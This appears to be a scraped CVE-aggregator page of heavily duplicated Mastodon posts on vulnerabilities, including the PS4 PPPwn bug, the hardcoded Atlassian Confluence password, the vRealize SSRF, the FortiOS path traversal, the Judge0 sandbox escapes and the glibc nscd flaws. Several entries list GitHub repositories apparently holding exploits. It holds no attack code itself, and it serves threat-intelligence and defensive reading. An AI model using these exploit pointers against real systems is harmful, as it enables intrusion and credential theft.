Sysdig reported on a cloud-based campaign leveraging stolen cloud credentials to target 10 cloud-hosted large language model (LLM) services. The goal is selling access and this attack is called "LLMjacking." (seriously who comes up with these stupid names? this better not show up in the next version of the CEH exam) Sysdig notes CVE-2021-3129 (9.8 critical, disclosed 12 January 2021, added to KEV Catalog 18 September 2023) was exploited to get credentials. Once initial access was obtained, the attackers exfiltrated cloud credentials and pivoted to the cloud environment, where they attempted to access local LLM models hosted by cloud providers. Sysdig provides a technical analysis and IOC.

##

screaminggoat@infosec.exchange at 2024-04-25T14:29:48.000Z ##

Sysdig: LLMjacking: Stolen Cloud Credentials Used in New AI Attack
Sysdig reported on a cloud-based campaign leveraging stolen cloud credentials to target 10 cloud-hosted large language model (LLM) services. The goal is selling access and this attack is called "LLMjacking." (seriously who comes up with these stupid names? this better not show up in the next version of the CEH exam) Sysdig notes CVE-2021-3129 (9.8 critical, disclosed 12 January 2021, added to KEV Catalog 18 September 2023) was exploited to get credentials. Once initial access was obtained, the attackers exfiltrated cloud credentials and pivoted to the cloud environment, where they attempted to access local LLM models hosted by cloud providers. Sysdig provides a technical analysis and IOC.

#LLMjacking #CVE_2021_3129 #threatintel #IOC

##

CVE-2006-4304(CVSS UNKNOWN)

EPSS: 6.64%

updated 2023-02-01T05:01:22

4 posts

Buffer overflow in the sppp driver in FreeBSD 4.11 through 6.1, NetBSD 2.0 through 4.0 beta before 20060823, and OpenBSD 3.8 and 3.9 before 20060902 allows remote attackers to cause a denial of service (panic), obtain sensitive information, and possibly execute arbitrary code via crafted Link Control Protocol (LCP) packets with an option length that exceeds the overall length, which triggers the o

Polynomial_C@mastodon.social at 2024-04-30T18:43:15.000Z ##

PPPwn - PlayStation 4 PPPoE RCE

"PPPwn is a kernel remote code execution #exploit for #PlayStation 4 upto FW 11.00. This is a proof-of-concept exploit for CVE-2006-4304 that was reported responsibly to PlayStation."

github.com/TheOfficialFloW/PPP

##

decio at 2024-04-26T12:03:47.458Z ##

Tiens, le pwnage de la PlayStation, discuté depuis le début de l'année, repose sur une faille de sécurité datant de 2006!

"For some reason, the PS4/PS5 is vulnerable to CVE-2006-4304. By having invalid options, it is possible to cause a heap buffer overwrite and overread."
👇
hackerone.com/reports/2177925

"PS4/PS5: TheFloW discloses Kernel vulnerability relying on old bug from 2006, impacts PS4 up to 11.00 & PS5 up to 8.20, more details in May"
👇
wololo.net/2024/04/26/ps4-ps5-

##

Polynomial_C@mastodon.social at 2024-04-30T18:43:15.000Z ##

PPPwn - PlayStation 4 PPPoE RCE

"PPPwn is a kernel remote code execution #exploit for #PlayStation 4 upto FW 11.00. This is a proof-of-concept exploit for CVE-2006-4304 that was reported responsibly to PlayStation."

github.com/TheOfficialFloW/PPP

##

decio@infosec.exchange at 2024-04-26T12:03:47.000Z ##

Tiens, le pwnage de la PlayStation, discuté depuis le début de l'année, repose sur une faille de sécurité datant de 2006!

"For some reason, the PS4/PS5 is vulnerable to CVE-2006-4304. By having invalid options, it is possible to cause a heap buffer overwrite and overread."
👇
hackerone.com/reports/2177925

"PS4/PS5: TheFloW discloses Kernel vulnerability relying on old bug from 2006, impacts PS4 up to 11.00 & PS5 up to 8.20, more details in May"
👇
wololo.net/2024/04/26/ps4-ps5-

#CVE_2006_4304 #PS5Share

##

CVE-2020-8657(CVSS UNKNOWN)

EPSS: 16.36%

updated 2023-01-29T05:01:16

2 posts

An issue was discovered in EyesOfNetwork 5.3. The installation uses the same API key (hardcoded as EONAPI_KEY in include/api_functions.php for API version 2.4.2) by default for all installations, hence allowing an attacker to calculate/guess the admin access token.

screaminggoat at 2024-05-01T13:40:41.063Z ##

@cR0w @reverseics There's an timeless argument of whether or not hardcoded default credentials is a vulnerability worth of a CVE.

A search in CISA's KEV Catalog shows CVE-2024-3272, CVE-2022-26138, CVE-2020-29583, CVE-2020-8657 of various products have the title ending in "Use of Hard-Coded Credentials Vulnerability." CVE-2023-6448 is the only one for "default password vulnerability."

##

screaminggoat@infosec.exchange at 2024-05-01T13:40:41.000Z ##

@cR0w @reverseics There's an timeless argument of whether or not hardcoded default credentials is a vulnerability worth of a CVE.

A search in CISA's KEV Catalog shows CVE-2024-3272, CVE-2022-26138, CVE-2020-29583, CVE-2020-8657 of various products have the title ending in "Use of Hard-Coded Credentials Vulnerability." CVE-2023-6448 is the only one for "default password vulnerability."

#CveCrowdDeny

##

CVE-2022-26138
(9.8 CRITICAL)

EPSS: 97.21%

updated 2023-01-27T05:06:26

2 posts

The Atlassian Questions For Confluence app for Confluence Server and Data Center creates a Confluence user account in the confluence-users group with the username disabledsystemuser and a hardcoded password. A remote, unauthenticated attacker with knowledge of the hardcoded password could exploit this to log into Confluence and access all content accessible to users in the confluence-users group.

Nuclei template

4 repos

https://github.com/z92g/CVE-2022-26138

https://github.com/Vulnmachines/Confluence-Question-CVE-2022-26138-

https://github.com/shavchen/CVE-2022-26138

https://github.com/alcaparra/CVE-2022-26138

screaminggoat at 2024-05-01T13:40:41.063Z ##

@cR0w @reverseics There's an timeless argument of whether or not hardcoded default credentials is a vulnerability worth of a CVE.

A search in CISA's KEV Catalog shows CVE-2024-3272, CVE-2022-26138, CVE-2020-29583, CVE-2020-8657 of various products have the title ending in "Use of Hard-Coded Credentials Vulnerability." CVE-2023-6448 is the only one for "default password vulnerability."

##

screaminggoat@infosec.exchange at 2024-05-01T13:40:41.000Z ##

@cR0w @reverseics There's an timeless argument of whether or not hardcoded default credentials is a vulnerability worth of a CVE.

A search in CISA's KEV Catalog shows CVE-2024-3272, CVE-2022-26138, CVE-2020-29583, CVE-2020-8657 of various products have the title ending in "Use of Hard-Coded Credentials Vulnerability." CVE-2023-6448 is the only one for "default password vulnerability."

#CveCrowdDeny

##

CVE-2021-21975
(7.5 HIGH)

EPSS: 97.40%

updated 2022-02-01T17:45:43.750000

4 posts

Server Side Request Forgery in vRealize Operations Manager API (CVE-2021-21975) prior to 8.4 may allow a malicious actor with network access to the vRealize Operations Manager API can perform a Server Side Request Forgery attack to steal administrative credentials.

Nuclei template

10 repos

https://github.com/murataydemir/CVE-2021-21975

https://github.com/rabidwh0re/REALITY_SMASHER

https://github.com/CyberCommands/CVE2021-21975

https://github.com/zhzyker/vulmap

https://github.com/dorkerdevil/CVE-2021-21975

https://github.com/Vulnmachines/VMWare-CVE-2021-21975

https://github.com/Al1ex/CVE-2021-21975

https://github.com/TheTh1nk3r/exp_hub

https://github.com/GuayoyoCyber/CVE-2021-21975

https://github.com/Henry4E36/VMWare-vRealize-SSRF

screaminggoat at 2024-04-30T14:02:23.382Z ##

SonicWall: Vintage Bugs: Data Shows Old Vulnerabilities Still Menace Small Businesses
For small to medium businesses (SMB), SonicWall says that the top five most widespread network attacks used were 3-10 old vulnerabilities. SonicWall suggests that attackers are more likely to take the easiest path to obtain their end goal.

  • Log4j CVE-2021-44228 (10.0 critical, disclosed 10 December 2021 as exploited zero day)
  • Fortinet SSL VPN CVE-2018-13379 (9.8 critical, disclosed 04 June 2018)
  • Heartbleed CVE-2014-0160 (7.5 high, disclosed 07 April 2014)
  • Atlassian Preauth AFR CVE-2021-26085 (5.3 medium, disclosed 02 August 2021)
  • VMware SSRF CVE-2021-21975 (7.5 high, disclosed 31 March 2021)

##

screaminggoat@infosec.exchange at 2024-04-30T14:02:23.000Z ##

SonicWall: Vintage Bugs: Data Shows Old Vulnerabilities Still Menace Small Businesses
For small to medium businesses (SMB), SonicWall says that the top five most widespread network attacks used were 3-10 old vulnerabilities. SonicWall suggests that attackers are more likely to take the easiest path to obtain their end goal.

  • Log4j CVE-2021-44228 (10.0 critical, disclosed 10 December 2021 as exploited zero day)
  • Fortinet SSL VPN CVE-2018-13379 (9.8 critical, disclosed 04 June 2018)
  • Heartbleed CVE-2014-0160 (7.5 high, disclosed 07 April 2014)
  • Atlassian Preauth AFR CVE-2021-26085 (5.3 medium, disclosed 02 August 2021)
  • VMware SSRF CVE-2021-21975 (7.5 high, disclosed 31 March 2021)

#SMB #cybersecurity #vulnerability #CVE_2021_44228 #CVE_2018_13379 #CVE_2014_0160 #CVE_2021_26085 #CVE_2021_21975

##

screaminggoat at 2024-04-30T14:02:23.382Z ##

SonicWall: Vintage Bugs: Data Shows Old Vulnerabilities Still Menace Small Businesses
For small to medium businesses (SMB), SonicWall says that the top five most widespread network attacks used were 3-10 old vulnerabilities. SonicWall suggests that attackers are more likely to take the easiest path to obtain their end goal.

  • Log4j CVE-2021-44228 (10.0 critical, disclosed 10 December 2021 as exploited zero day)
  • Fortinet SSL VPN CVE-2018-13379 (9.8 critical, disclosed 04 June 2018)
  • Heartbleed CVE-2014-0160 (7.5 high, disclosed 07 April 2014)
  • Atlassian Preauth AFR CVE-2021-26085 (5.3 medium, disclosed 02 August 2021)
  • VMware SSRF CVE-2021-21975 (7.5 high, disclosed 31 March 2021)

##

screaminggoat@infosec.exchange at 2024-04-30T14:02:23.000Z ##

SonicWall: Vintage Bugs: Data Shows Old Vulnerabilities Still Menace Small Businesses
For small to medium businesses (SMB), SonicWall says that the top five most widespread network attacks used were 3-10 old vulnerabilities. SonicWall suggests that attackers are more likely to take the easiest path to obtain their end goal.

  • Log4j CVE-2021-44228 (10.0 critical, disclosed 10 December 2021 as exploited zero day)
  • Fortinet SSL VPN CVE-2018-13379 (9.8 critical, disclosed 04 June 2018)
  • Heartbleed CVE-2014-0160 (7.5 high, disclosed 07 April 2014)
  • Atlassian Preauth AFR CVE-2021-26085 (5.3 medium, disclosed 02 August 2021)
  • VMware SSRF CVE-2021-21975 (7.5 high, disclosed 31 March 2021)

#SMB #cybersecurity #vulnerability #CVE_2021_44228 #CVE_2018_13379 #CVE_2014_0160 #CVE_2021_26085 #CVE_2021_21975

##

CVE-2018-13379
(9.8 CRITICAL)

EPSS: 97.41%

updated 2021-06-03T11:15:08.307000

4 posts

An Improper Limitation of a Pathname to a Restricted Directory ("Path Traversal") in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP resource requests.

Nuclei template

12 repos

https://github.com/W01fh4cker/Serein

https://github.com/Zeop-CyberSec/fortios_vpnssl_traversal_leak

https://github.com/hackingyseguridad/directoriotraversal

https://github.com/milo2012/CVE-2018-13379

https://github.com/yukar1z0e/CVE-2018-13379

https://github.com/Blazz3/cve2018-13379-nmap-script

https://github.com/B1anda0/CVE-2018-13379

https://github.com/pwn3z/CVE-2018-13379-FortinetVPN

https://github.com/nivdolgin/CVE-2018-13379

https://github.com/jpiechowka/at-doom-fortigate

https://github.com/0xHunter/FortiOS-Credentials-Disclosure

https://github.com/k4nfr3/CVE-2018-13379-Fortinet

screaminggoat at 2024-04-30T14:02:23.382Z ##

SonicWall: Vintage Bugs: Data Shows Old Vulnerabilities Still Menace Small Businesses
For small to medium businesses (SMB), SonicWall says that the top five most widespread network attacks used were 3-10 old vulnerabilities. SonicWall suggests that attackers are more likely to take the easiest path to obtain their end goal.

  • Log4j CVE-2021-44228 (10.0 critical, disclosed 10 December 2021 as exploited zero day)
  • Fortinet SSL VPN CVE-2018-13379 (9.8 critical, disclosed 04 June 2018)
  • Heartbleed CVE-2014-0160 (7.5 high, disclosed 07 April 2014)
  • Atlassian Preauth AFR CVE-2021-26085 (5.3 medium, disclosed 02 August 2021)
  • VMware SSRF CVE-2021-21975 (7.5 high, disclosed 31 March 2021)

##

screaminggoat@infosec.exchange at 2024-04-30T14:02:23.000Z ##

SonicWall: Vintage Bugs: Data Shows Old Vulnerabilities Still Menace Small Businesses
For small to medium businesses (SMB), SonicWall says that the top five most widespread network attacks used were 3-10 old vulnerabilities. SonicWall suggests that attackers are more likely to take the easiest path to obtain their end goal.

  • Log4j CVE-2021-44228 (10.0 critical, disclosed 10 December 2021 as exploited zero day)
  • Fortinet SSL VPN CVE-2018-13379 (9.8 critical, disclosed 04 June 2018)
  • Heartbleed CVE-2014-0160 (7.5 high, disclosed 07 April 2014)
  • Atlassian Preauth AFR CVE-2021-26085 (5.3 medium, disclosed 02 August 2021)
  • VMware SSRF CVE-2021-21975 (7.5 high, disclosed 31 March 2021)

#SMB #cybersecurity #vulnerability #CVE_2021_44228 #CVE_2018_13379 #CVE_2014_0160 #CVE_2021_26085 #CVE_2021_21975

##

screaminggoat at 2024-04-30T14:02:23.382Z ##

SonicWall: Vintage Bugs: Data Shows Old Vulnerabilities Still Menace Small Businesses
For small to medium businesses (SMB), SonicWall says that the top five most widespread network attacks used were 3-10 old vulnerabilities. SonicWall suggests that attackers are more likely to take the easiest path to obtain their end goal.

  • Log4j CVE-2021-44228 (10.0 critical, disclosed 10 December 2021 as exploited zero day)
  • Fortinet SSL VPN CVE-2018-13379 (9.8 critical, disclosed 04 June 2018)
  • Heartbleed CVE-2014-0160 (7.5 high, disclosed 07 April 2014)
  • Atlassian Preauth AFR CVE-2021-26085 (5.3 medium, disclosed 02 August 2021)
  • VMware SSRF CVE-2021-21975 (7.5 high, disclosed 31 March 2021)

##

screaminggoat@infosec.exchange at 2024-04-30T14:02:23.000Z ##

SonicWall: Vintage Bugs: Data Shows Old Vulnerabilities Still Menace Small Businesses
For small to medium businesses (SMB), SonicWall says that the top five most widespread network attacks used were 3-10 old vulnerabilities. SonicWall suggests that attackers are more likely to take the easiest path to obtain their end goal.

  • Log4j CVE-2021-44228 (10.0 critical, disclosed 10 December 2021 as exploited zero day)
  • Fortinet SSL VPN CVE-2018-13379 (9.8 critical, disclosed 04 June 2018)
  • Heartbleed CVE-2014-0160 (7.5 high, disclosed 07 April 2014)
  • Atlassian Preauth AFR CVE-2021-26085 (5.3 medium, disclosed 02 August 2021)
  • VMware SSRF CVE-2021-21975 (7.5 high, disclosed 31 March 2021)

#SMB #cybersecurity #vulnerability #CVE_2021_44228 #CVE_2018_13379 #CVE_2014_0160 #CVE_2021_26085 #CVE_2021_21975

##

CVE-2024-28189
(0 None)

EPSS: 0.04%

6 posts

N/A

jos1264@social.skynetcloud.site at 2024-04-30T17:45:04.000Z ##

Critical Vulnerabilities in Judge0 Lead to Sandbox Escape, Host Takeover securityweek.com/critical-vuln #Malware&Threats #Vulnerabilities #CVE202428189 #CVE202429021 #Judge0

##

jos1264@social.skynetcloud.site at 2024-04-30T17:45:02.000Z ##

Critical Vulnerabilities in Judge0 Lead to Sandbox Escape, Host Takeover securityweek.com/critical-vuln #Malware&Threats #Vulnerabilities #CVE202428189 #CVE202429021 #Judge0

##

screaminggoat at 2024-04-29T13:52:07.868Z ##

Tanto Security: Judge0 Sandbox Escape
Judge0 is an open source service used to run arbitrary code inside a secure sandbox. Tanto Security disclosed vulnerabilities (including proofs of concept and exploit scripts) in Judge0 that allows an adversary with sufficient access to perform a sandbox escape and obtain root permissions on the host machine. h/t @buherator

  • CVE-2024-29021 (9.0 critical) Server Side Request Forgery (SSRF) leads to sandbox escape, an attacker with sufficient access to the Judge0 API obtains unsandboxed code execution as root on the target machine.
  • CVE-2024-28185 (10.0 critical) Symlinks placed inside the sandbox directory can be leveraged by an attacker to write to arbitrary files and gain code execution outside of the sandbox.
  • CVE-2024-28189 (10.0 critical) Symlink to a file outside the sandbox allows an attacker to run chown on arbitrary files outside of the sandbox. Considered CVE-2024-28185 patch bypass.

##

screaminggoat@infosec.exchange at 2024-04-29T13:52:07.000Z ##

Tanto Security: Judge0 Sandbox Escape
Judge0 is an open source service used to run arbitrary code inside a secure sandbox. Tanto Security disclosed vulnerabilities (including proofs of concept and exploit scripts) in Judge0 that allows an adversary with sufficient access to perform a sandbox escape and obtain root permissions on the host machine. h/t @buherator

  • CVE-2024-29021 (9.0 critical) Server Side Request Forgery (SSRF) leads to sandbox escape, an attacker with sufficient access to the Judge0 API obtains unsandboxed code execution as root on the target machine.
  • CVE-2024-28185 (10.0 critical) Symlinks placed inside the sandbox directory can be leveraged by an attacker to write to arbitrary files and gain code execution outside of the sandbox.
  • CVE-2024-28189 (10.0 critical) Symlink to a file outside the sandbox allows an attacker to run chown on arbitrary files outside of the sandbox. Considered CVE-2024-28185 patch bypass.

#CVE_2024_29021 #CVE_2024_28185 #CVE_2024_28189 #CVE_2024_28185 #Judge0 #proofofconcept #vulnerability

##

jbhall56 at 2024-05-01T12:15:33.264Z ##

The company documented the flaws in an advisory that warns that Judge0 versions prior to 1.13.1 are impacted by CVE-2024-28185, CVE-2024-28189, and CVE-2024-29021. securityweek.com/critical-vuln

##

jbhall56@infosec.exchange at 2024-05-01T12:15:33.000Z ##

The company documented the flaws in an advisory that warns that Judge0 versions prior to 1.13.1 are impacted by CVE-2024-28185, CVE-2024-28189, and CVE-2024-29021. securityweek.com/critical-vuln

##

CVE-2024-29021
(0 None)

EPSS: 0.04%

6 posts

N/A

jos1264@social.skynetcloud.site at 2024-04-30T17:45:04.000Z ##

Critical Vulnerabilities in Judge0 Lead to Sandbox Escape, Host Takeover securityweek.com/critical-vuln #Malware&Threats #Vulnerabilities #CVE202428189 #CVE202429021 #Judge0

##

jos1264@social.skynetcloud.site at 2024-04-30T17:45:02.000Z ##

Critical Vulnerabilities in Judge0 Lead to Sandbox Escape, Host Takeover securityweek.com/critical-vuln #Malware&Threats #Vulnerabilities #CVE202428189 #CVE202429021 #Judge0

##

screaminggoat at 2024-04-29T13:52:07.868Z ##

Tanto Security: Judge0 Sandbox Escape
Judge0 is an open source service used to run arbitrary code inside a secure sandbox. Tanto Security disclosed vulnerabilities (including proofs of concept and exploit scripts) in Judge0 that allows an adversary with sufficient access to perform a sandbox escape and obtain root permissions on the host machine. h/t @buherator

  • CVE-2024-29021 (9.0 critical) Server Side Request Forgery (SSRF) leads to sandbox escape, an attacker with sufficient access to the Judge0 API obtains unsandboxed code execution as root on the target machine.
  • CVE-2024-28185 (10.0 critical) Symlinks placed inside the sandbox directory can be leveraged by an attacker to write to arbitrary files and gain code execution outside of the sandbox.
  • CVE-2024-28189 (10.0 critical) Symlink to a file outside the sandbox allows an attacker to run chown on arbitrary files outside of the sandbox. Considered CVE-2024-28185 patch bypass.

##

screaminggoat@infosec.exchange at 2024-04-29T13:52:07.000Z ##

Tanto Security: Judge0 Sandbox Escape
Judge0 is an open source service used to run arbitrary code inside a secure sandbox. Tanto Security disclosed vulnerabilities (including proofs of concept and exploit scripts) in Judge0 that allows an adversary with sufficient access to perform a sandbox escape and obtain root permissions on the host machine. h/t @buherator

  • CVE-2024-29021 (9.0 critical) Server Side Request Forgery (SSRF) leads to sandbox escape, an attacker with sufficient access to the Judge0 API obtains unsandboxed code execution as root on the target machine.
  • CVE-2024-28185 (10.0 critical) Symlinks placed inside the sandbox directory can be leveraged by an attacker to write to arbitrary files and gain code execution outside of the sandbox.
  • CVE-2024-28189 (10.0 critical) Symlink to a file outside the sandbox allows an attacker to run chown on arbitrary files outside of the sandbox. Considered CVE-2024-28185 patch bypass.

#CVE_2024_29021 #CVE_2024_28185 #CVE_2024_28189 #CVE_2024_28185 #Judge0 #proofofconcept #vulnerability

##

jbhall56 at 2024-05-01T12:15:33.264Z ##

The company documented the flaws in an advisory that warns that Judge0 versions prior to 1.13.1 are impacted by CVE-2024-28185, CVE-2024-28189, and CVE-2024-29021. securityweek.com/critical-vuln

##

jbhall56@infosec.exchange at 2024-05-01T12:15:33.000Z ##

The company documented the flaws in an advisory that warns that Judge0 versions prior to 1.13.1 are impacted by CVE-2024-28185, CVE-2024-28189, and CVE-2024-29021. securityweek.com/critical-vuln

##

CVE-2024-33599
(0 None)

EPSS: 0.00%

8 posts

N/A

harrysintonen at 2024-05-03T20:58:16.924Z ##

Several vulnerabilities have been discovered in , the Name Service Cache Daemon in the which may lead to denial of service or the execution of arbitrary code.

The vulnerability details:
- CVE-2024-33599: sourceware.org/bugzilla/show_b
- CVE-2024-33600: sourceware.org/bugzilla/show_b
- CVE-2024-33601: sourceware.org/bugzilla/show_b
- CVE-2024-33602: sourceware.org/bugzilla/show_b

lists.debian.org/debian-securi

##

harrysintonen@infosec.exchange at 2024-05-03T20:58:16.000Z ##

Several vulnerabilities have been discovered in #nscd, the Name Service Cache Daemon in the #glibc which may lead to denial of service or the execution of arbitrary code.

The vulnerability details:
- CVE-2024-33599: sourceware.org/bugzilla/show_b
- CVE-2024-33600: sourceware.org/bugzilla/show_b
- CVE-2024-33601: sourceware.org/bugzilla/show_b
- CVE-2024-33602: sourceware.org/bugzilla/show_b

lists.debian.org/debian-securi #vulnerability #infosec #cybersecurity #CVE202433599 #CVE202433600 #CVE202433601 #CVE202433602

##

screaminggoat at 2024-05-03T21:05:38.460Z ##

@harrysintonen they really should have explicitly written out each vulnerability's description. None of them are live on cve.org (and NVD by extension.)

Unrelated but I've taken to writing out the CVEs like because it's easier to read and I make less mistakes.

##

screaminggoat@infosec.exchange at 2024-05-03T21:05:38.000Z ##

@harrysintonen they really should have explicitly written out each vulnerability's description. None of them are live on cve.org (and NVD by extension.)

Unrelated but I've taken to writing out the CVEs like #CVE_2024_33599 #CVE_2024_33600 #CVE_2024_33601 #CVE_2024_33602 because it's easier to read and I make less mistakes.

##

harrysintonen at 2024-05-03T20:58:16.924Z ##

Several vulnerabilities have been discovered in , the Name Service Cache Daemon in the which may lead to denial of service or the execution of arbitrary code.

The vulnerability details:
- CVE-2024-33599: sourceware.org/bugzilla/show_b
- CVE-2024-33600: sourceware.org/bugzilla/show_b
- CVE-2024-33601: sourceware.org/bugzilla/show_b
- CVE-2024-33602: sourceware.org/bugzilla/show_b

lists.debian.org/debian-securi

##

harrysintonen@infosec.exchange at 2024-05-03T20:58:16.000Z ##

Several vulnerabilities have been discovered in #nscd, the Name Service Cache Daemon in the #glibc which may lead to denial of service or the execution of arbitrary code.

The vulnerability details:
- CVE-2024-33599: sourceware.org/bugzilla/show_b
- CVE-2024-33600: sourceware.org/bugzilla/show_b
- CVE-2024-33601: sourceware.org/bugzilla/show_b
- CVE-2024-33602: sourceware.org/bugzilla/show_b

lists.debian.org/debian-securi #vulnerability #infosec #cybersecurity #CVE202433599 #CVE202433600 #CVE202433601 #CVE202433602

##

screaminggoat at 2024-05-03T21:05:38.460Z ##

@harrysintonen they really should have explicitly written out each vulnerability's description. None of them are live on cve.org (and NVD by extension.)

Unrelated but I've taken to writing out the CVEs like because it's easier to read and I make less mistakes.

##

screaminggoat@infosec.exchange at 2024-05-03T21:05:38.000Z ##

@harrysintonen they really should have explicitly written out each vulnerability's description. None of them are live on cve.org (and NVD by extension.)

Unrelated but I've taken to writing out the CVEs like #CVE_2024_33599 #CVE_2024_33600 #CVE_2024_33601 #CVE_2024_33602 because it's easier to read and I make less mistakes.

##

CVE-2024-33600
(0 None)

EPSS: 0.00%

8 posts

N/A

harrysintonen at 2024-05-03T20:58:16.924Z ##

Several vulnerabilities have been discovered in , the Name Service Cache Daemon in the which may lead to denial of service or the execution of arbitrary code.

The vulnerability details:
- CVE-2024-33599: sourceware.org/bugzilla/show_b
- CVE-2024-33600: sourceware.org/bugzilla/show_b
- CVE-2024-33601: sourceware.org/bugzilla/show_b
- CVE-2024-33602: sourceware.org/bugzilla/show_b

lists.debian.org/debian-securi

##

harrysintonen@infosec.exchange at 2024-05-03T20:58:16.000Z ##

Several vulnerabilities have been discovered in #nscd, the Name Service Cache Daemon in the #glibc which may lead to denial of service or the execution of arbitrary code.

The vulnerability details:
- CVE-2024-33599: sourceware.org/bugzilla/show_b
- CVE-2024-33600: sourceware.org/bugzilla/show_b
- CVE-2024-33601: sourceware.org/bugzilla/show_b
- CVE-2024-33602: sourceware.org/bugzilla/show_b

lists.debian.org/debian-securi #vulnerability #infosec #cybersecurity #CVE202433599 #CVE202433600 #CVE202433601 #CVE202433602

##

screaminggoat at 2024-05-03T21:05:38.460Z ##

@harrysintonen they really should have explicitly written out each vulnerability's description. None of them are live on cve.org (and NVD by extension.)

Unrelated but I've taken to writing out the CVEs like because it's easier to read and I make less mistakes.

##

screaminggoat@infosec.exchange at 2024-05-03T21:05:38.000Z ##

@harrysintonen they really should have explicitly written out each vulnerability's description. None of them are live on cve.org (and NVD by extension.)

Unrelated but I've taken to writing out the CVEs like #CVE_2024_33599 #CVE_2024_33600 #CVE_2024_33601 #CVE_2024_33602 because it's easier to read and I make less mistakes.

##

harrysintonen at 2024-05-03T20:58:16.924Z ##

Several vulnerabilities have been discovered in , the Name Service Cache Daemon in the which may lead to denial of service or the execution of arbitrary code.

The vulnerability details:
- CVE-2024-33599: sourceware.org/bugzilla/show_b
- CVE-2024-33600: sourceware.org/bugzilla/show_b
- CVE-2024-33601: sourceware.org/bugzilla/show_b
- CVE-2024-33602: sourceware.org/bugzilla/show_b

lists.debian.org/debian-securi

##

harrysintonen@infosec.exchange at 2024-05-03T20:58:16.000Z ##

Several vulnerabilities have been discovered in #nscd, the Name Service Cache Daemon in the #glibc which may lead to denial of service or the execution of arbitrary code.

The vulnerability details:
- CVE-2024-33599: sourceware.org/bugzilla/show_b
- CVE-2024-33600: sourceware.org/bugzilla/show_b
- CVE-2024-33601: sourceware.org/bugzilla/show_b
- CVE-2024-33602: sourceware.org/bugzilla/show_b

lists.debian.org/debian-securi #vulnerability #infosec #cybersecurity #CVE202433599 #CVE202433600 #CVE202433601 #CVE202433602

##

screaminggoat at 2024-05-03T21:05:38.460Z ##

@harrysintonen they really should have explicitly written out each vulnerability's description. None of them are live on cve.org (and NVD by extension.)

Unrelated but I've taken to writing out the CVEs like because it's easier to read and I make less mistakes.

##

screaminggoat@infosec.exchange at 2024-05-03T21:05:38.000Z ##

@harrysintonen they really should have explicitly written out each vulnerability's description. None of them are live on cve.org (and NVD by extension.)

Unrelated but I've taken to writing out the CVEs like #CVE_2024_33599 #CVE_2024_33600 #CVE_2024_33601 #CVE_2024_33602 because it's easier to read and I make less mistakes.

##

CVE-2024-33601
(0 None)

EPSS: 0.00%

8 posts

N/A

harrysintonen at 2024-05-03T20:58:16.924Z ##

Several vulnerabilities have been discovered in , the Name Service Cache Daemon in the which may lead to denial of service or the execution of arbitrary code.

The vulnerability details:
- CVE-2024-33599: sourceware.org/bugzilla/show_b
- CVE-2024-33600: sourceware.org/bugzilla/show_b
- CVE-2024-33601: sourceware.org/bugzilla/show_b
- CVE-2024-33602: sourceware.org/bugzilla/show_b

lists.debian.org/debian-securi

##

harrysintonen@infosec.exchange at 2024-05-03T20:58:16.000Z ##

Several vulnerabilities have been discovered in #nscd, the Name Service Cache Daemon in the #glibc which may lead to denial of service or the execution of arbitrary code.

The vulnerability details:
- CVE-2024-33599: sourceware.org/bugzilla/show_b
- CVE-2024-33600: sourceware.org/bugzilla/show_b
- CVE-2024-33601: sourceware.org/bugzilla/show_b
- CVE-2024-33602: sourceware.org/bugzilla/show_b

lists.debian.org/debian-securi #vulnerability #infosec #cybersecurity #CVE202433599 #CVE202433600 #CVE202433601 #CVE202433602

##

screaminggoat at 2024-05-03T21:05:38.460Z ##

@harrysintonen they really should have explicitly written out each vulnerability's description. None of them are live on cve.org (and NVD by extension.)

Unrelated but I've taken to writing out the CVEs like because it's easier to read and I make less mistakes.

##

screaminggoat@infosec.exchange at 2024-05-03T21:05:38.000Z ##

@harrysintonen they really should have explicitly written out each vulnerability's description. None of them are live on cve.org (and NVD by extension.)

Unrelated but I've taken to writing out the CVEs like #CVE_2024_33599 #CVE_2024_33600 #CVE_2024_33601 #CVE_2024_33602 because it's easier to read and I make less mistakes.

##

harrysintonen at 2024-05-03T20:58:16.924Z ##

Several vulnerabilities have been discovered in , the Name Service Cache Daemon in the which may lead to denial of service or the execution of arbitrary code.

The vulnerability details:
- CVE-2024-33599: sourceware.org/bugzilla/show_b
- CVE-2024-33600: sourceware.org/bugzilla/show_b
- CVE-2024-33601: sourceware.org/bugzilla/show_b
- CVE-2024-33602: sourceware.org/bugzilla/show_b

lists.debian.org/debian-securi

##

harrysintonen@infosec.exchange at 2024-05-03T20:58:16.000Z ##

Several vulnerabilities have been discovered in #nscd, the Name Service Cache Daemon in the #glibc which may lead to denial of service or the execution of arbitrary code.

The vulnerability details:
- CVE-2024-33599: sourceware.org/bugzilla/show_b
- CVE-2024-33600: sourceware.org/bugzilla/show_b
- CVE-2024-33601: sourceware.org/bugzilla/show_b
- CVE-2024-33602: sourceware.org/bugzilla/show_b

lists.debian.org/debian-securi #vulnerability #infosec #cybersecurity #CVE202433599 #CVE202433600 #CVE202433601 #CVE202433602

##

screaminggoat at 2024-05-03T21:05:38.460Z ##

@harrysintonen they really should have explicitly written out each vulnerability's description. None of them are live on cve.org (and NVD by extension.)

Unrelated but I've taken to writing out the CVEs like because it's easier to read and I make less mistakes.

##

screaminggoat@infosec.exchange at 2024-05-03T21:05:38.000Z ##

@harrysintonen they really should have explicitly written out each vulnerability's description. None of them are live on cve.org (and NVD by extension.)

Unrelated but I've taken to writing out the CVEs like #CVE_2024_33599 #CVE_2024_33600 #CVE_2024_33601 #CVE_2024_33602 because it's easier to read and I make less mistakes.

##

CVE-2024-33602
(0 None)

EPSS: 0.00%

8 posts

N/A

harrysintonen at 2024-05-03T20:58:16.924Z ##

Several vulnerabilities have been discovered in , the Name Service Cache Daemon in the which may lead to denial of service or the execution of arbitrary code.

The vulnerability details:
- CVE-2024-33599: sourceware.org/bugzilla/show_b
- CVE-2024-33600: sourceware.org/bugzilla/show_b
- CVE-2024-33601: sourceware.org/bugzilla/show_b
- CVE-2024-33602: sourceware.org/bugzilla/show_b

lists.debian.org/debian-securi

##

harrysintonen@infosec.exchange at 2024-05-03T20:58:16.000Z ##

Several vulnerabilities have been discovered in #nscd, the Name Service Cache Daemon in the #glibc which may lead to denial of service or the execution of arbitrary code.

The vulnerability details:
- CVE-2024-33599: sourceware.org/bugzilla/show_b
